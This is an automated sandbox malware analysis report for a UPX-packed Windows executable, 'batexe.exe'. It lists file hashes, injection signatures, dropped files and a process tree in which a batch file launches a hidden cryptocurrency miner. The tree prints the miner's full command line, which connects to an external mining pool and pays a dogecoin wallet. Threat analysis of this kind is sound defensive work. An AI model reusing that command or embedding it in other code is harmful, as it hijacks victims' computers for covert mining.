73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
297s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
11-02-2024 18:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
780	b2e.exe
2900	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2900	cpuminer-sse2.exe
2900	cpuminer-sse2.exe
2900	cpuminer-sse2.exe
2900	cpuminer-sse2.exe
2900	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2676-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 780	2676	batexe.exe	74
PID 2676 wrote to memory of 780	2676	batexe.exe	74
PID 2676 wrote to memory of 780	2676	batexe.exe	74
PID 780 wrote to memory of 4352	780	b2e.exe	75
PID 780 wrote to memory of 4352	780	b2e.exe	75
PID 780 wrote to memory of 4352	780	b2e.exe	75
PID 4352 wrote to memory of 2900	4352	cmd.exe	78
PID 4352 wrote to memory of 2900	4352	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Users\Admin\AppData\Local\Temp\9BB3.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9BB3.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9BB3.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9D69.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4352
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9BB3.tmp\b2e.exe

Filesize
192KB

MD5
6ac4b534a8945150025756c2f85dd2d4

SHA1
4f8633cd78b9248d5885e75ff1b26ef27a196ad1

SHA256
2e07e008a86c33e31905b1f49b18245261ad08ed3463c6750d63502e1e20e43d

SHA512
303f0cd104441235da58583af1597994df43d0a2d55d6245e89fc7d8f2509915525925277636214722e922f2939c93ba95627d54a18105d6cfa8e606b2f3c172

Download Submit
C:\Users\Admin\AppData\Local\Temp\9BB3.tmp\b2e.exe

Filesize
15.1MB

MD5
1681907f09bec7c5906de271a667da18

SHA1
55075ba4a01ddc53e97fc01d0841f4c62daea9d0

SHA256
afb72f9fa6ae644d1fb32547e051cc0a16403e7047e8b61226988b3b26e8e861

SHA512
1e6b87feaa76ea63042ffd4c48fb127246e1f7647ab391c322d7b6b4f63682643583392da78d8f3c84c92c000d24b995dd2ec07cb3094d88d916ca6302e5cb4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\9D69.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
939KB

MD5
785eca3a0caa777385096d3510a1ce14

SHA1
f4a40044bda3748f4e56847553e0560616f5d7a5

SHA256
e80981aaaeb982b0e2c36c535cd95f763fff403d98542cee8dfdf06aa9df70f0

SHA512
9a6a91a73263cfd80458dfba95af249e03c5617a133d9b53cff4d9069249efaaa41535ded84b86fbfddd868c050c4839406660e4235e107b17eedad304094988

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
85e0981f82a17940b829465e317ae965

SHA1
0a29fc630ad9760c68eb6ff26e2cf7870e4994b5

SHA256
dae76db6c929a7d30fda25808785536c7a501eea7b95fa1a6c409eb0f9fee6c0

SHA512
61e425ada5868e51496947584f540fb38061aad599982760a33760f54ce533db149ccc671aea9ab23a3b6c3f5f8e73b40961ac338f9f573be886c8019edaea1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
bfb4058ebdae16a4a99d2efb8efaeb40

SHA1
1cb3d808c24b993c29af1fc7b1a8fa0f3188cb86

SHA256
e170455a8861bf37099b2f823a422c3c8331ee3b10fb8323b0d2c4208198e816

SHA512
59c9b419d24c8984783fc62926ba4e3a1fb7e4f9ed21303e19da040fa8b7a475c32f181f66c026a1b0b04f18eaa15f4e40c421b615e1878c0d6fd6cc5e9dc34b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
a10a12880bd43f7ebcc4eb3df4e7691d

SHA1
8b939e8772e7f4c50d0831b56a8bb744e8d313b3

SHA256
250500c1a234e3cb9d1aea802f86246be8c36b7a3d5c6ec98ea257d7f47c36ef

SHA512
a65736f06475bbc1ab8fd6014828c1f64ac99ccafb62a4d97fac3a6e4c558b7f1ab87655ef20cba523acda8b51e917bd835e59c66786451610248db4c5a1dac3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
c89e863ce2221a0f49b45a55100e468c

SHA1
569ede311983a53a8f23f254fe37735538cbfa5e

SHA256
5ca5fb55f2e5ddee30c893b0e78d1ad59f593c2c3e5ecc155f14a088c65cfb46

SHA512
f65476f7353ef6ca7378752551c28736b61916cbf54f0a17b211a5a14ab93ddc2830a1d9c3cc1118117a23be95d49b06fc8a174d1a87f360ae4b96a6bbde04b0

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
2.0MB

MD5
30753edce7c0e96f837c03ac5f2531f4

SHA1
529a63bc741eb628f64119689e319a40e9914ac4

SHA256
f1d129c2088b33845eb5391e96298c64d850f1980bf18709dbb4afb49423017f

SHA512
495f9d04534dc2c479f8dd82124b31fd6ef6f9d5a947d97419f2cd4aecbf8296457c55a567c42d9b12ad3974105b71793b70e3945586264b86d3ae2a9fc22ed3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.5MB

MD5
ae4753f3e558c0d384b37f7506d89943

SHA1
7dda2bdf01e0796198b42c312ce947dd9a28a797

SHA256
5281c8af11c1e77d6aee2f9445d3053c1fa0a5b0f11f16aeb54e2c708e049652

SHA512
95671306e981bbe58589bbec81dbcdb2743382837e6d2556c5a1a5110480422b9222b2857ecab88202f3c5cecf3e3f36ae1519238ba6f43d1ba0edb947052d38

Download Submit
memory/780-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/780-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2676-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2900-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-43-0x000000005DF00000-0x000000005DF98000-memory.dmp

Filesize
608KB

Download
memory/2900-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2900-44-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/2900-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2900-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2900-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download